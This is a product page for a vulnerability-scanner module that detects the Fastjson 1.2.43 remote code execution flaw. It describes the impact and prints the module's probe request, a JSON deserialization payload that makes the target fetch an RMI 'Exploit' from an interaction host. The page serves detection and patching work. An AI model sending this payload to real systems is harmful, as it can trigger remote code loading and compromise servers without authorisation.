Ethical Hacking Automation

Automate Recon and scanning process with Vidoc. All security teams in one place

Fastjson 1.2.43 - Remote Code Execution

By kannthu

Critical
Vidoc logoVidoc Module
#fastjson#rce#deserialization#oast
Description

What is "Fastjson 1.2.43 - Remote Code Execution?"

The "Fastjson 1.2.43 - Remote Code Execution" module is designed to detect a critical vulnerability in the Fastjson 1.2.43 software. Fastjson is a Java library used for parsing and generating JSON data. This module specifically targets version 1.2.43 of Fastjson.

This vulnerability allows remote attackers to execute arbitrary code on the target system, potentially leading to a complete compromise of the affected application. It is crucial to address this vulnerability promptly to prevent unauthorized access and potential data breaches.

Impact

If successfully exploited, this vulnerability can have severe consequences for the affected application and its users. An attacker can execute arbitrary code remotely, which may result in unauthorized access, data manipulation, or even a complete takeover of the system. This can lead to the exposure of sensitive information, disruption of services, and potential financial and reputational damage.

How the module works?

The "Fastjson 1.2.43 - Remote Code Execution" module works by sending a crafted HTTP request to the target system. The request is designed to exploit the vulnerability in Fastjson 1.2.43 and execute arbitrary code on the target system.

Here is an example of the HTTP request sent by the module:

POST / HTTP/1.1
Host: <Hostname>
Content-Type: application/json

{
   "@type":"com.sun.rowset.JdbcRowSetImpl",
   "dataSourceName":"rmi://<InteractionURL>/Exploit",
   "autoCommit":true
}

The module also includes matching conditions to determine if the vulnerability is present. It checks for the presence of the "dns" protocol in the response and verifies that the HTTP status code is not 200. If both conditions are met, the module reports the vulnerability.

It is essential to regularly scan and patch systems running Fastjson 1.2.43 to mitigate the risk of remote code execution and protect against potential attacks.

Module preview

Concurrent Requests (1)
1. HTTP Request template
Raw request
Matching conditions
word: dnsand
NOT status: 200
Passive global matcher
No matching conditions.
On match action
Report vulnerability